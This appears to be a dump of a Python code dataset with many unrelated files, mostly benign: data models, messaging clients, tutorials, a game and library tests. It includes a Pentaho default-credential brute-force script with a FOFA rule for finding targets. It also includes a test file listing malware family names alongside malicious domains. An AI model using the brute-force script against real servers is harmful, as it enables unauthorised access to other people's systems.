content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
"""
Copyright Tiyab KONLAMBIGUE
Licensed under the BSD 3-Clause "New" or "Revised" license;
you may not use this file except in compliance with the License.
You may obtain a copy of the License at : https://opensource.org/licenses/BSD-3-Clause
"""
from google.appengine.ext import ndb
class Job(ndb.Model):
creation = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
emails = ndb.StringProperty()
project_id = ndb.StringProperty()
bucket_id = ndb.StringProperty()
machine_name = ndb.StringProperty()
startup_script = ndb.StringProperty()
shutdown_script = ndb.StringProperty()
machine_type = ndb.StringProperty()
machine_zone = ndb.StringProperty()
machine_os = ndb.StringProperty()
cron_schedule = ndb.StringProperty()
after_run = ndb.StringProperty()
max_running_time = ndb.StringProperty()
job_name = ndb.StringProperty()
job_status = ndb.StringProperty()
last_run = ndb.DateTimeProperty()
# Get list of job
@classmethod
def query(self, query, max_line):
results = []
query = ndb.GqlQuery(query)
for query_line in query.run(limit=max_line):
results.append(query_line)
return results
# Get job
def get(self, filtering):
results = []
query = self.gql(filtering)
for query_line in query:
results.append(query_line)
return results
def to_dict(self):
return {
"key": self.key.urlsafe() if self.key else None,
"creation": str(self.creation) if self.creation else None,
"updated": str(self.updated) if self.updated else None,
"emails": str(self.emails) if self.emails else None,
"project": str(self.project) if self.project else None,
"bucket_id": str(self.bucket_id) if self.bucket_id else None,
"machine_name": str(self.machine_name) if self.machine_name else None,
"startup_script": str(self.startup_script) if self.startup_script else None,
"shutdown_script": str(self.shutdown_script) if self.shutdown_script else None,
"machine_type": str(self.machine_type) if self.machine_type else None,
"machine_zone": str(self.machine_zone) if self.machine_zone else None,
"machine_os": str(self.machine_os) if self.machine_os else None,
"after_run": str(self.after_run) if self.after_run else None,
"cron_schedule": str(self.cron_schedule) if self.cron_schedule else None,
"max_running_time": str(self.max_running_time) if self.max_running_time else None,
"job_name": str(self.job_name) if self.job_name else None,
"job_status": str(self.job_status) if self.job_status else None,
"last_run": str(self.last_run) if self.last_run else None,
}
## JOB TO RUN QUEUE
class Queue(ndb.Model):
creation = ndb.DateTimeProperty(auto_now_add=True)
project_id = ndb.StringProperty()
bucket_id = ndb.StringProperty()
machine_name = ndb.StringProperty()
machine_type = ndb.StringProperty()
machine_zone = ndb.StringProperty()
machine_os = ndb.StringProperty()
after_run = ndb.StringProperty()
max_running_time = ndb.StringProperty()
job_name = ndb.StringProperty()
# Get list of job
@classmethod
def query(self, query, max_line):
results = []
query = ndb.GqlQuery(query)
for query_line in query.run(limit=max_line):
results.append(query_line)
return results
# Get job
def get(self, filtering):
results = []
query = self.gql(filtering)
for query_line in query:
results.append(query_line)
return results
def to_dict(self):
return {
"key": self.key.urlsafe() if self.key else None,
"creation": str(self.creation) if self.creation else None,
"project": str(self.project) if self.project else None,
"bucket_id": str(self.bucket_id) if self.bucket_id else None,
"machine_name": str(self.machine_name) if self.machine_name else None,
"machine_type": str(self.machine_type) if self.machine_type else None,
"machine_zone": str(self.machine_zone) if self.machine_zone else None,
"machine_os": str(self.machine_os) if self.machine_os else None,
"after_run": str(self.after_run) if self.after_run else None,
"max_running_time": str(self.max_running_time) if self.max_running_time else None,
"job_name": str(self.job_name) if self.job_name else None,
"job_status": str(self.job_status) if self.job_status else None,
}
|
python
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
# Helper Functions
def get_options():
#parse cmd arguments
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Sends messages to a topic on the amqp broker")
parser.add_option("-u", "--url", action="store", default="amqp://localhost:5672",
help="Url to connect to amqp broker (default %default)")
parser.add_option("-t", "--topic", action="store", default="a/topic",
help="Topic to send message (default %default)")
parser.add_option("-m", "--messages", type="int", default=100,
help="number of messages to receive (default %default)")
parser.add_option("-o", "--username", default=None,
help="username for authentication (default %default)")
parser.add_option("-p", "--password", default=None,
help="password for authentication (default %default)")
(options, args) = parser.parse_args()
return options
"""
Proton event Handler class
Establishes an amqp connection and creates an amqp sender link to transmit messages
"""
class MessageProducer(MessagingHandler):
def __init__(self, url, address, count, username, password):
super(MessageProducer, self).__init__()
# the solace message broker amqp url
self.url = url
# the prefix amqp address for a solace topic
self.topic_address = address
# authentication credentials
self.username = username
self.password = password
self.total = count
self.sent = 0
self.confirmed = 0
def on_start(self, event):
# select authentication from SASL PLAIN or SASL ANONYMOUS
if self.username:
# creates and establishes amqp connection using PLAIN authentication
conn = event.container.connect(url=self.url,
user=self.username,
password=self.password,
allow_insecure_mechs=True)
else:
# creates and establishes amqp connection using ANONYMOUS authentication
conn = event.container.connect(url=self.url)
if conn:
# creates sender link to transfer message to the broker
event.container.create_sender(conn, target=self.topic_address)
def on_sendable(self, event):
while event.sender.credit and self.sent < self.total:
# the durable property on the message sends the message as a persistent message
event.sender.send(Message(body="hello "+str(self.sent), durable=True))
self.sent += 1
def on_accepted(self, event):
self.confirmed += 1
if self.confirmed == self.total:
print('confirmed all messages')
event.connection.close()
def on_rejected(self, event):
self.confirmed += 1
print("Broker", self.url, "Reject message:", event.delivery.tag, "Remote disposition:", event.delivery.remote.condition)
if self.confirmed == self.total:
event.connection.close()
# receives socket or authentication failures
def on_transport_error(self, event):
print("Transport failure for amqp broker:", self.url, "Error:", event.transport.condition)
MessagingHandler.on_transport_error(self, event)
# get program options
options = get_options()
"""
The amqp address can be a topic or a queue.
Use 'topic://' prefix in the amqp address for the amqp sender
target address to indicate which topic message are sent to.
"""
amqp_address = 'topic://' + options.topic
try:
# starts the proton container event loop with the MessageProducer event handler
Container(MessageProducer(options.url, amqp_address, options.messages, options.username, options.password)).run()
except KeyboardInterrupt: pass
|
python
|
# tuples are lists but immutable
# the syntax is ( parenthesis )
# list
l = [1,2,3]
l[0] = 5 # you can do this
print(type(l))
print(l)
# tuple
t = (1,2,3)
# t[0] = 5 # you can't do this
print(type(t))
print(t)
# tuples only have two methods, a lot less than lists
t = ('a', 'a', 'b', 'b', 'c', 'c')
print(f"the amount of instances of the character 'a' in the tuple is {t.count('a')}")
print(f"the first index in the tuple that has the character 'c' is {t.index('c')}")
|
python
|
import sys
import re
from functools import partial
def flush_print(st, *args, **kwargs):
end = kwargs.pop('end', '\n')
if args:
st = st % args
print(st, end=end)
if sys.stdout.isatty():
sys.stdout.flush()
def cprint(color_fn, st, *args):
if args:
st = st % args
print(color_fn(st), end='')
sys.stdout.flush()
def dot_lead(st, *args, **kwargs):
width = kwargs.pop('width', 60)
if args:
st = st % args
dots = '.' * (width - len(st))
return '%s%s' % (st, dots)
def dot_leader(st, *args, **kwargs):
width = kwargs.pop('width', 60)
if args:
st = st % args
dots = '.' * (width - len(st))
flush_print('%s%s', st, dots, **kwargs)
COLORS = (
'black', 'red', 'green', 'yellow',
'blue', 'magenta', 'cyan', 'white')
STYLES = (
'bold', 'faint', 'italic', 'underline',
'blink', 'blink2', 'negative',
'concealed', 'crossed')
def _ansi_color(x, offset, ansi_code):
if x:
if x in COLORS:
return [ f'{offset + COLORS.index(x)}' ]
if isinstance(x, int) and 0 <= x <= 255:
return [ f'{ansi_code};5;{x}' ]
raise Exception('Invalid color [{x}]')
return []
def _style_codes(style):
codes = []
if style:
for st in style.split('+'):
if st in STYLES:
codes.append(f'{(1 + STYLES.index(st))}')
else:
raise Exception('Invalid style "{st}"')
return codes
def color(s, fg=None, bg=None, style=None):
sgr = _ansi_color(fg, 30, 38) + _ansi_color(bg, 40, 48)
sgr += _style_codes(style)
if sgr:
return f"\x1b[{';'.join(sgr)}m{s}\x1b[0m"
return s
def strip_color(s):
return re.sub(r'\x1b\[.+?m', '', s)
# Foreground shortcuts
black = partial(color, fg='black')
red = partial(color, fg='red')
green = partial(color, fg='green')
yellow = partial(color, fg='yellow')
blue = partial(color, fg='blue')
magenta = partial(color, fg='magenta')
cyan = partial(color, fg='cyan')
white = partial(color, fg='white')
# Style shortcuts
bold = partial(color, style='bold')
faint = partial(color, style='faint')
italic = partial(color, style='italic')
underline = partial(color, style='underline')
blink = partial(color, style='blink')
blink2 = partial(color, style='blink2')
negative = partial(color, style='negative')
concealed = partial(color, style='concealed')
crossed = partial(color, style='crossed')
|
python
|
#!/usr/bin/env python
print("hi from Python 3")
|
python
|
"""Background job to perform a DNS lookup and insert into or update in the db.
Attributes:
DNS_SERVERS: A list of strs representing which DNS servers to use
DNS_BLOCKLIST: A str representing the blocklist to send a DNS lookup to
"""
import dns.resolver
from models import IPDetails, ResponseCode
# Spamhaus will not work with Google's public DNS servers
# https://www.spamhaus.org/faq/section/DNSBL%20Usage#261
DNS_SERVERS = ["208.67.222.222"] # OpenDNS
DNS_BLOCKLIST = "zen.spamhaus.org"
def upsert_ip_details(ip_address):
"""Insert or update an IPDetails record in the db.
Args:
ip_address: A str representing the record in the db to insert or update
"""
response_codes = dns_lookup(ip_address)
ip_details = IPDetails.query.filter_by(ip_address=ip_address).first()
if ip_details is None:
ip_details = IPDetails(
response_codes=response_codes, ip_address=ip_address
)
ip_details.insert()
else:
ip_details.response_codes = response_codes
ip_details.update()
def dns_lookup(ip_address):
"""Perform a DNS lookup of an IP address to a blocklist.
Args:
ip_address: A str representing the ip address to perform a DNS lookup
against a blocklist
Returns:
response_codes: A list of ResponseCode objects representing the
returned response codes from the DNS lookup against a blocklist
"""
ip_address = ip_address.split(".")
if len(ip_address) != 4 or not all(num.isnumeric() for num in ip_address):
raise TypeError("Incorrect format for IPv4 IP Address")
ip_address = ".".join(reversed(ip_address))
response_codes = []
dns.resolver.get_default_resolver().nameservers = DNS_SERVERS
try:
answer = dns.resolver.resolve(f"{ip_address}.{DNS_BLOCKLIST}")
except dns.resolver.NXDOMAIN:
return response_codes
for data in answer:
response_code = ResponseCode.query.filter_by(
response_code=str(data)
).first()
if response_code is None:
response_code = ResponseCode(response_code=str(data))
response_code.insert()
response_codes.append(response_code)
return response_codes
|
python
|
from scrapy import cmdline
if __name__ == '__main__':
# cmdline.execute('scrapy crawl xinFang'.split())
# cmdline.execute('scrapy crawl erShouFang'.split())
cmdline.execute('scrapy crawl zuFang'.split())
|
python
|
from .build_model import add_weights, build_model
|
python
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import requests
from Config.config_requests import ua
requests.packages.urllib3.disable_warnings()
# 脚本信息
######################################################
NAME = 'pentaho_bruteforce'
AUTHOR = "Trans"
REMARK = 'pentaho密码爆破'
FOFA_RULE = 'app="pentaho"'
######################################################
def poc(target):
result={}
url = target + "/pentaho"
refer = url+ "/Login"
url += "/j_spring_security_check"
login_headers = {
"User-Agent": ua,
"Referer": refer
}
webapp_usernames = {'admin':'password', 'joe': 'password', 'suzy': 'password', 'tiffany':'password', 'pat': 'password' }
for user in webapp_usernames:
path_store = ['/public/plugin-samples', '/public/bi-developers']
login_data = {"j_username": user, "j_password": webapp_usernames[user], "locale": "en_US"}
response = requests.post(url, headers=login_headers, data=login_data,verify=False,timeout=5)
if '/Home' in response.url:
print('Logging in as '+ user + ' / ' + webapp_usernames[user])
result['target'] = target
result['username'] = user
result['password'] = webapp_usernames[user]
return result
if __name__ == '__main__':
poc("http://127.0.0.1:3312")
|
python
|
# Copyright (c) 2019, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: Giselle Serate <[email protected]>
'''
Palo Alto Networks testcases.py
Defines parameters for the test.
Include this file; do not run it directly.
This software is provided without support, warranty, or guarantee.
Use at your own risk.
'''
class ParseTest():
def __init__(self):
# Static version notes metadata
self.version = '3026-3536'
self.version_date = '2019-07-01T04:00:52-07:00'
# If we process this much or more, we pass
self.percent_processed = 0.5
# Establish cases to check are in the database.
self.cases = [{'raw': 'None:gacyqob.com', 'action': 'added'},
{'raw': 'Backdoor.simda:gahyraw.com', 'action': 'added'},
{'raw': 'None:pupycag.com', 'action': 'added'},
{'raw': 'PWS.simda:qetyhyg.com', 'action': 'added'},
{'raw': 'Backdoor.simda:vojykom.com', 'action': 'added'},
{'raw': 'Backdoor.simda:vowygem.com', 'action': 'added'},
{'raw': 'None:vowyzuk.com', 'action': 'added'},
{'raw': 'Worm.pykspa:agadss.biz', 'action': 'added'},
{'raw': 'Worm.pykspa:qgasocuiwcymao.info', 'action': 'added'},
{'raw': 'Worm.pykspa:ygsink.info', 'action': 'added'},
{'raw': 'Worm.ainslot:ryan12345.no-ip.biz', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:hngdecor.com', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:okeanbg.com', 'action': 'added'},
{'raw': 'TrojanDownloader.upatre:gert-hof.de', 'action': 'added'},
{'raw': 'Packed.fe:spaines.pw', 'action': 'added'},
{'raw': 'None:recdataoneveter.cc', 'action': 'added'},
{'raw': 'Backdoor.vawtrak:mbbllmv.eu', 'action': 'removed'},
{'raw': 'None:mfkxyucmxwhw.com', 'action': 'removed'},
{'raw': 'Worm.pykspa:kegbceiq.info', 'action': 'removed'},
{'raw': 'Virus.gippers:microsoft.mypicture.info', 'action': 'removed'},
{'raw': 'DDoS.nitol:a7677767.vicp.net', 'action': 'removed'},
{'raw': 'Worm.pykspa:yeuawkuiwcymao.info', 'action': 'removed'},
{'raw': 'None:zief.pl', 'action': 'removed'},
{'raw': 'Virus.palevogen:.banjalucke-ljepotice.ru', 'action': 'removed'},
{'raw': 'VirTool.ceeinject:digitalmind.cn', 'action': 'removed'},
{'raw': 'Virus.virut:irc.zief.pl', 'action': 'removed'},
{'raw': 'Trojan.dorv:lyvyxor.com', 'action': 'removed'},
{'raw': 'Virus.sality:sungkhomwit.com', 'action': 'removed'},
{'raw': 'Virus.sality:asesoriaenexposicion.com', 'action': 'removed'},
{'raw': 'TrojanSpy.nivdort:doubledistant.net', 'action': 'removed'},
{'raw': 'None:extsc.3322.org', 'action': 'removed'},
{'raw': 'Virus.sality:solitaireinfo.com', 'action': 'removed'}]
|
python
|
import pycountry
from matcher.server.main.elastic_utils import get_analyzers, get_char_filters, get_filters, get_index_name, get_mappings
from matcher.server.main.logger import get_logger
from matcher.server.main.my_elastic import MyElastic
SOURCE = 'country'
logger = get_logger(__name__)
def download_country_data():
countries = [c.__dict__['_fields'] for c in list(pycountry.countries)]
return countries
def transform_country_data(raw_data):
subdivision_name, subdivision_code = {}, {}
for subdivision in pycountry.subdivisions:
alpha2 = subdivision.country_code.lower()
if alpha2 not in subdivision_name:
subdivision_name[alpha2] = []
if alpha2 not in subdivision_code:
subdivision_code[alpha2] = []
subdivision_name[alpha2].append(subdivision.name)
if alpha2 == 'us':
subdivision_code[alpha2].append(subdivision.code[3:])
if alpha2 == 'gb':
subdivision_name[alpha2].append('northern ireland')
countries = []
for c in raw_data:
# Alpha 2 - 3
alpha2 = c['alpha_2'].lower()
alpha3 = c['alpha_3'].lower()
country = {'alpha2': alpha2, 'alpha3': [alpha3]}
if alpha2 == 'gb':
country['alpha3'].append('uk')
# Names
names = []
for field_name in ['name', 'official_name', 'common_name']:
if field_name in c:
names.append(c[field_name])
switcher = {
'bn': ['brunei'],
'ci': ['ivory coast'],
'cv': ['cape verde'],
'cz': ['czech'],
'de': ['deutschland'],
'gb': ['uk'],
'ir': ['iran'],
'kp': ['north korea'],
'kr': ['south korea', 'republic of korea'],
'la': ['laos'],
'mo': ['macau'],
'ru': ['russia'],
'sy': ['syria'],
'tw': ['taiwan'],
'us': ['usa'],
'vn': ['vietnam']
}
names += switcher.get(alpha2, [])
names = list(set(names))
country['name'] = names
# Subdivisions
if alpha2 in subdivision_name:
country['subdivision_name'] = list(set(subdivision_name[alpha2]))
country['subdivision_code'] = list(set(subdivision_code[alpha2]))
countries.append(country)
return countries
def load_country(index_prefix: str = 'matcher') -> dict:
es = MyElastic()
settings = {
'analysis': {
'char_filter': get_char_filters(),
'filter': get_filters(),
'analyzer': get_analyzers()
}
}
analyzers = {
'name': 'name_analyzer',
'subdivision_name': 'light',
'subdivision_code': 'light',
'alpha3': 'light'
}
criteria = list(analyzers.keys())
es_data = {}
for criterion in criteria:
index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
analyzer = analyzers[criterion]
es.create_index(index=index, mappings=get_mappings(analyzer), settings=settings)
es_data[criterion] = {}
raw_countries = download_country_data()
countries = transform_country_data(raw_countries)
# Iterate over country data
for country in countries:
for criterion in criteria:
criterion_values = country.get(criterion)
criterion_values = criterion_values if isinstance(criterion_values, list) else [criterion_values]
if criterion_values is None:
logger.debug(f'This element {country} has no {criterion}')
continue
for criterion_value in criterion_values:
if criterion_value not in es_data[criterion]:
es_data[criterion][criterion_value] = []
es_data[criterion][criterion_value].append({'country_alpha2': country['alpha2']})
# Bulk insert data into ES
actions = []
results = {}
for criterion in es_data:
index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
analyzer = analyzers[criterion]
results[index] = len(es_data[criterion])
for criterion_value in es_data[criterion]:
if criterion_value:
action = {'_index': index,
'country_alpha2': list(set([k['country_alpha2'] for k in
es_data[criterion][criterion_value]])),
'query': {
'match_phrase': {'content': {'query': criterion_value, 'analyzer': analyzer, 'slop': 2}}}}
actions.append(action)
es.parallel_bulk(actions=actions)
return results
|
python
|
#--------------#
# Look Away! #
# By: Santo C. #
#--------------#
# Created October 26, 2006 (c) Santo C.
# Import the modules needed.
import random
from time import sleep
# Rules Document
Rules = """==========
Rules of the game:
------------------
Standing in front of you is your game host.
He will point in one direction, and you have to
face the other direction by selecting the direction.
For example, he will point left, which means you will
have to look right, and it's done at the split of the
moment, so you never know...
Bonne Chance!
==========
"""
#
# -The Game Begins!-
#
print """--------------------------------------
+--------------+
| Look Away! |
| By: Santo C. |
+--------------+
How to play:
Look the other way from the game host!
--------------------------------------
Look Away! (c) 2006 Santo C.
--------------------------------------
"""
#Game Loop
while True:
print "-=MAIN MENU=-"
print "1) Game Rules"
print "2) Play"
print "3) Quit Game"
SLCT = raw_input("Select Choice: ")
print
if SLCT == '1': # List rules here.
print Rules
elif SLCT == '2':
print "Alright, let's play!"
print
sleep(2)
print "(The game host approaches you for the game...)"
print
sleep(2)
print "Host: Hello there! Let's play some Look Away!"
print
sleep(2)
print "Host: Right... When you're ready..."
print "... You can look to the Left, or the Right, or quit at any time."
print
sleep(2)
while True:
print "(Which way will you look?)"
Direction = raw_input('(1) Left / (2) Right / (3) Quit : ')
print
if Direction == '1':
sleep(2)
print "(You will look to the left...)"
print
sleep(2)
print "Host: Ready? And..."
print
sleep(2)
HostDirection = str(random.randrange(1,3))
print "GO!"
print "You: ", '<='
if HostDirection == '1': print "Host:", '<='
elif HostDirection == '2': print "Host:", '=>'
print
sleep(2)
if HostDirection != Direction:
print "Host: Good, you looked the other way! You win!"
print
elif HostDirection == Direction:
print "Host: Hah, you looked my direction! You lose!"
print
elif Direction == '2':
sleep(2)
print "(You will look to the right...)"
print
sleep(2)
print "Host: Ready? And..."
print
sleep(2)
HostDirection = str(random.randrange(1,3))
print "GO!"
print "You: ", '=>'
if HostDirection == '1': print "Host:", '<='
elif HostDirection == '2': print "Host:", '=>'
print
sleep(2)
if HostDirection != Direction:
print "Host: Good, you looked the other way! You win!"
print
elif HostDirection == Direction:
print "Host: Hah, you looked my direction! You lose!"
print
sleep(2)
elif Direction == '3':
break
else:
print
print "Please select an option!"
print
elif SLCT == '3':
print "Alright then. About face, and goodbye! :)"
sleep(2)
break
else:
print "Please select an option!"
print
|
python
|
from django.db import models
# model to store incoming unpaid cheque details
class UnpaidCheque(models.Model):
raw_string = models.CharField(max_length=100)
voucher_code = models.CharField(max_length=3)
cheque_number = models.CharField(max_length=100)
reason_code = models.CharField(max_length=3)
cheque_amount = models.DecimalField(max_digits=9, decimal_places=2)
cheque_value_date = models.DateField()
ft_ref = models.CharField(max_length=100, blank=True, null=True)
logged_at = models.DateTimeField(auto_now_add=True)
is_unpaid = models.BooleanField(default=False)
unpaid_value_date = models.DateField(blank=True, null=True)
cc_record = models.CharField(max_length=100, blank=True, null=True)
unpay_success_indicator = models.CharField(max_length=50, blank=True, null=True)
unpay_error_message = models.CharField(max_length=100, blank=True, null=True)
cheque_account = models.CharField(max_length=100, blank=True, null=True)
owner = models.ForeignKey('auth.User', related_name='unpaid_cheques', on_delete=models.CASCADE)
def __str__(self):
return self.ft_ref
class Meta:
ordering = ['logged_at']
# model to store charge details
class Charge(models.Model):
charge_id = models.CharField(max_length=100)
charge_account = models.CharField(max_length=100)
charge_amount = models.DecimalField(max_digits=9, decimal_places=2)
charge_value_date = models.DateField()
charge_success_indicator = models.CharField(max_length=50, blank=True, null=True)
ofs_id = models.CharField(max_length=100, blank=True, null=True)
ft_ref = models.CharField(max_length=100, blank=True, null=True)
is_collected = models.BooleanField(default=False)
charge_error_message = models.CharField(max_length=100, blank=True, null=True)
cc_record = models.ForeignKey('UnpaidCheque', related_name='charges', on_delete=models.CASCADE)
owner = models.ForeignKey('auth.User', related_name='charges', on_delete=models.CASCADE)
def __str__(self):
return self.charge_id
class Meta:
ordering = ['charge_id']
|
python
|
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for reverb.trajectory_writer."""
from typing import Optional
from unittest import mock
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from reverb import client as client_lib
from reverb import pybind
from reverb import server as server_lib
from reverb import trajectory_writer
import tree
class FakeWeakCellRef:
def __init__(self, data):
self.data = data
@property
def shape(self):
return np.asarray(self.data).shape
@property
def dtype(self):
return np.asarray(self.data).dtype
def extract_data(column: trajectory_writer._ColumnHistory):
return [ref.data if ref else None for ref in column]
def _mock_append(x):
return [FakeWeakCellRef(y) if y is not None else None for y in x]
class TrajectoryWriterTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.cpp_writer_mock = mock.Mock()
self.cpp_writer_mock.Append.side_effect = _mock_append
self.cpp_writer_mock.AppendPartial.side_effect = _mock_append
self.writer = trajectory_writer.TrajectoryWriter(self.cpp_writer_mock)
def test_history_require_append_to_be_called_before(self):
with self.assertRaises(RuntimeError):
_ = self.writer.history
def test_history_contains_references_when_data_flat(self):
self.writer.append(0)
self.writer.append(1)
self.writer.append(2)
history = tree.map_structure(extract_data, self.writer.history)
self.assertListEqual(history, [0, 1, 2])
def test_history_contains_structured_references(self):
self.writer.append({'x': 1, 'y': 100})
self.writer.append({'x': 2, 'y': 101})
self.writer.append({'x': 3, 'y': 102})
history = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(history, {'x': [1, 2, 3], 'y': [100, 101, 102]})
def test_history_structure_evolves_with_data(self):
self.writer.append({'x': 1, 'z': 2})
first = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(first, {'x': [1], 'z': [2]})
self.writer.append({'z': 3, 'y': 4})
second = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(second, {
'x': [1, None],
'z': [2, 3],
'y': [None, 4],
})
self.writer.append({'w': 5})
third = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(third, {
'x': [1, None, None],
'z': [2, 3, None],
'y': [None, 4, None],
'w': [None, None, 5],
})
self.writer.append({'x': 6, 'w': 7})
forth = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(forth, {
'x': [1, None, None, 6],
'z': [2, 3, None, None],
'y': [None, 4, None, None],
'w': [None, None, 5, 7],
})
@parameterized.named_parameters(
('tuple', (0,), (0, 1)),
('dict', {'x': 0}, {'x': 0, 'y': 1}),
('list', [0], [0, 1]),
)
def test_append_with_more_fields(self, first_step_data, second_step_data):
self.writer.append(first_step_data)
self.writer.append(second_step_data)
def test_append_returns_same_structure_as_data(self):
first_step_data = {'x': 1, 'y': 2}
first_step_ref = self.writer.append(first_step_data)
tree.assert_same_structure(first_step_data, first_step_ref)
# Check that this holds true even if the data structure changes between
# steps.
second_step_data = {'y': 2, 'z': 3}
second_step_ref = self.writer.append(second_step_data)
tree.assert_same_structure(second_step_data, second_step_ref)
def test_append_forwards_flat_data_to_cpp_writer(self):
data = {'x': 1, 'y': 2}
self.writer.append(data)
self.cpp_writer_mock.Append.assert_called_with(tree.flatten(data))
def test_partial_append_appends_to_the_same_step(self):
# Create a first step and keep it open.
self.writer.append({'x': 1, 'z': 2}, partial_step=True)
first = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(first, {'x': [1], 'z': [2]})
# Append to the same step and keep it open.
self.writer.append({'y': 4}, partial_step=True)
second = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(second, {
'x': [1],
'z': [2],
'y': [4],
})
# Append to the same step and close it.
self.writer.append({'w': 5})
third = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(third, {
'x': [1],
'z': [2],
'y': [4],
'w': [5],
})
# Append to a new step.
self.writer.append({'w': 6})
forth = tree.map_structure(extract_data, self.writer.history)
self.assertDictEqual(forth, {
'x': [1, None],
'z': [2, None],
'y': [4, None],
'w': [5, 6],
})
def test_columns_must_not_appear_more_than_once_in_the_same_step(self):
# Create a first step and keep it open.
self.writer.append({'x': 1, 'z': 2}, partial_step=True)
# Add another unseen column alongside an existing column with a None value.
self.writer.append({'x': None, 'y': 3}, partial_step=True)
# Provide a value for a field that has already been set in this step.
with self.assertRaisesRegex(
ValueError,
r'Field \(\'x\',\) has already been set in the active step by previous '
r'\(partial\) append call and thus must be omitted or set to None but '
r'got: 4'):
self.writer.append({'x': 4})
def test_create_item_checks_type_of_leaves(self):
first = self.writer.append({'x': 3, 'y': 2})
second = self.writer.append({'x': 3, 'y': 2})
# History automatically transforms data and thus should be valid.
self.writer.create_item('table', 1.0, {
'x': self.writer.history['x'][0], # Just one step.
'y': self.writer.history['y'][:], # Two steps.
})
# Columns can be constructed explicitly.
self.writer.create_item('table', 1.0, {
'x': trajectory_writer.TrajectoryColumn([first['x']]),
'y': trajectory_writer.TrajectoryColumn([first['y'], second['y']])
})
# But all leaves must be TrajectoryColumn.
with self.assertRaises(TypeError):
self.writer.create_item('table', 1.0, {
'x': trajectory_writer.TrajectoryColumn([first['x']]),
'y': first['y'],
})
def test_flush_checks_block_until_num_itmes(self):
self.writer.flush(0)
self.writer.flush(1)
with self.assertRaises(ValueError):
self.writer.flush(-1)
def test_configure_uses_auto_tune_when_max_chunk_length_not_set(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=None)
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
0,
pybind.AutoTunedChunkerOptions(
num_keep_alive_refs=2, throughput_weight=1.0))
def test_configure_seen_column(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=1)
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
0,
pybind.ConstantChunkerOptions(
num_keep_alive_refs=2, max_chunk_length=1))
def test_configure_unseen_column(self):
self.writer.append({'x': 3, 'y': 2})
self.writer.configure(('z',), num_keep_alive_refs=2, max_chunk_length=1)
# The configure call should be delayed until the column has been observed.
self.cpp_writer_mock.ConfigureChunker.assert_not_called()
# Still not seen.
self.writer.append({'a': 4})
self.cpp_writer_mock.ConfigureChunker.assert_not_called()
self.writer.append({'z': 5})
self.cpp_writer_mock.ConfigureChunker.assert_called_with(
3,
pybind.ConstantChunkerOptions(
num_keep_alive_refs=2, max_chunk_length=1))
@parameterized.parameters(
(1, None, True),
(0, None, False),
(-1, None, False),
(1, 1, True),
(1, 0, False),
(1, -1, False),
(5, 5, True),
(4, 5, False),
)
def test_configure_validates_params(self, num_keep_alive_refs: int,
max_chunk_length: Optional[int],
valid: bool):
if valid:
self.writer.configure(('a',),
num_keep_alive_refs=num_keep_alive_refs,
max_chunk_length=max_chunk_length)
else:
with self.assertRaises(ValueError):
self.writer.configure(('a',),
num_keep_alive_refs=num_keep_alive_refs,
max_chunk_length=max_chunk_length)
def test_episode_steps(self):
for _ in range(10):
# Every episode, including the first, should start at zero.
self.assertEqual(self.writer.episode_steps, 0)
for i in range(1, 21):
self.writer.append({'x': 3, 'y': 2})
# Step count should increment with each append call.
self.assertEqual(self.writer.episode_steps, i)
# Ending the episode should reset the step count to zero.
self.writer.end_episode()
